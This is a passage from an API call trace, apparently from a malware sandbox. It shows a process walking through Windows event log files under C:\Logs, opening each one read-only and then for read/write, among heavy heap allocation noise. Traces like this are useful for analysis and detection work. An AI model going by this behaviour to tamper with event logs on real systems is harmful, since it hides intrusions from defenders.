Flags=0x0, Size=0x50) returned 0x6d3c8 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0086.987] AreFileApisANSI () returned 1 [0086.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0086.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.987] AreFileApisANSI () returned 1 [0086.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0086.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0086.987] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.987] GetFileType (hFile=0x424) returned 0x1 [0086.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.987] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.987] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.988] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.988] CloseHandle (hObject=0x424) returned 1 [0086.988] AreFileApisANSI () returned 1 [0086.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0086.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0086.988] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.988] GetFileType (hFile=0x424) returned 0x1 [0086.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.988] CloseHandle (hObject=0x424) returned 1 [0086.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0086.989] AreFileApisANSI () returned 1 [0086.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0086.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0086.989] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.989] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.990] AreFileApisANSI () returned 1 [0086.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0086.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.991] AreFileApisANSI () returned 1 [0086.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0086.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x467b8 [0086.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x467b8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0086.991] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.991] GetFileType (hFile=0x424) returned 0x1 [0086.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0086.991] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.991] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.992] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.992] CloseHandle (hObject=0x424) returned 1 [0086.992] AreFileApisANSI () returned 1 [0086.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0086.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46ac8 [0086.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0086.992] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.992] GetFileType (hFile=0x424) returned 0x1 [0086.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0086.992] CloseHandle (hObject=0x424) returned 1 [0086.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.993] AreFileApisANSI () returned 1 [0086.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x463c8 [0086.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0086.993] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.993] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.994] 